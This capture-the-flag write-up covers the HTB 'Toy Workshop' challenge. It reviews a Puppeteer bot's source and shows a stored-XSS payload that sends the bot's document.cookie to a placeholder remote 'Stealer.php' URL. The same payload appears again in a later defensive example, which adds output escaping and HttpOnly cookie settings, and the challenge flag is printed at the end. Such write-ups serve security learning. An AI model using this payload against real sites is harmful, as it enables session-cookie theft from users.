Day 1: Toy Workshop

challenge description
The work is going well on Santa's toy workshop but we lost contact with the manager 
in charge! We suspect the evil elves have taken over the workshop, can you talk to
the worker elves and find out?

As with all HTB Web challenges, the white-box view into the source code is a plus.

Enumeration

The website seems bare with only a nice looking landing page.

Web landing page

Luckily we do not need to dirbust, since we have the source code.

Source code review

Oo. Looking into the challenge directory, we see bot.js. Opening it, we see it is an app with a bot powered by Puppeteer. From the routes, we see a few interesting things.

routes

  • Only the bot can access the route /queries
  • Every time we POST to /api/submit, the bot will take a look at it and then delete it from the database

Within the readQueries function, we see the bot has access to the flag in its cookies.

bot.js
const puppeteer = require('puppeteer');
// cookies (which hold the flag) and browser_options are defined earlier in bot.js (not shown here)

const readQueries = async (db) => {
  const browser = await puppeteer.launch(browser_options);
  let context = await browser.createIncognitoBrowserContext();
  let page = await context.newPage();
  // Load the site first so the cookies can be set for this origin
  await page.goto('http://127.0.0.1:1337/');
  await page.setCookie(...cookies);
  // Visit /queries with the flag cookie present; any stored query is rendered here
  await page.goto('http://127.0.0.1:1337/queries', {
    waitUntil: 'networkidle2'
  });
  await browser.close();
  // Reset the database after the visit, so each submission is looked at only once
  await db.migrate();
};

Sounds perfect for XSS! Let's try it. The application only accepts JSON requests. We can expose a local Python HTTP server through a remote Ngrok URL to receive the stolen cookie.

payload
POST /api/submit
{
"query": "<script>location.href = 'http://<REMOTE_URL>/Stealer.php?cookie='+document.cookie</script>"
}
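For contrast, here is what the fix on the application side looks like. This is an added example written for this writeup, not code from the challenge source: it assumes the /queries page interpolates each stored query into HTML, and it escapes the HTML metacharacters before doing so, so the payload above is rendered as inert text. It also shows the cookie attributes that would have kept the flag out of reach of document.cookie even if a script did run.

```javascript
// Added defensive example (hypothetical; not part of the challenge code).
// Map of the HTML metacharacters that must be encoded on output.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Output-encode a string so it cannot close or open a tag or attribute.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render the stored queries the way a hardened /queries template would:
// every user-controlled value goes through escapeHtml() before interpolation.
function renderQueries(queries) {
  const items = queries.map((q) => `<li>${escapeHtml(q.query)}</li>`).join('\n');
  return `<ul>\n${items}\n</ul>`;
}

// Build a Set-Cookie value for the bot's flag cookie. HttpOnly hides it from
// document.cookie; Secure and SameSite=Strict limit where the browser sends it.
function flagCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Constructed sample input: one benign query and one of the payload type used above.
const SAMPLE_QUERIES = [
  { query: 'How many toys are left?' },
  { query: "<script>location.href = 'http://<REMOTE_URL>/Stealer.php?cookie='+document.cookie</script>" },
];

// Usage when run directly with node.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderQueries(SAMPLE_QUERIES));
  console.log(flagCookieHeader('flag', 'HTB{placeholder}'));
}
```

With escaping in place the bot's visit to /queries shows the literal text of the payload instead of executing it, and with HttpOnly set the cookie value never reaches page script at all. Either change alone would have blocked this particular exfiltration; both together is the usual baseline.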

Flag

HTB{3v1l_3lv3s_4r3_r1s1ng_up!}